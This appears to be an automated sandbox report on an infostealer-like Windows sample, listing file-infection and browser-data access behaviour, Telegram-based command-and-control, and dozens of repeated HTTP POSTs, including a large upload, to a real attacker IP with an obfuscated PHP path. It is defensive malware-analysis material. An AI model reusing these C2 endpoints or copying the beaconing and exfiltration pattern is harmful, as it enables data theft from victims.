Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: based.exe, 00000004.00000002.2390904759.00007FFDFAB8C000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: based.exe, based.exe, 00000004.00000002.2392560474.00007FFDFAF31000.00000040.00000001.01000000.00000019.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00D9C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00D9C4A8
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DAE560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00DAE560
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D017F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	1_2_00007FF67D017F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D017F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	1_2_00007FF67D017F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D021FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF67D021FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D008B00 FindFirstFileExW,FindClose,	1_2_00007FF67D008B00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B32DCE0 FindFirstFileExW,	2_2_000001F91B32DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF7272685A0 FindFirstFileExW,FindClose,	2_2_00007FF7272685A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF7272679B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF7272679B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727280B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF727280B84
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A4DCE0 FindFirstFileExW,	4_2_00000201D1A4DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF7272685A0 FindFirstFileExW,FindClose,	4_2_00007FF7272685A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727280B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	4_2_00007FF727280B84
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF7272679B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_00007FF7272679B0

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\	Jump to behavior

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 162.159.136.232 162.159.136.232

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown

DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1552Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1972Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1972Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1972Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: multipart/form-data; boundary=----eTwOLJhoufyL2P3BNzX1CU6eJZ78WmysxBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 135542Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1996Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1960Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1960Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1996Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1996Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1996Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
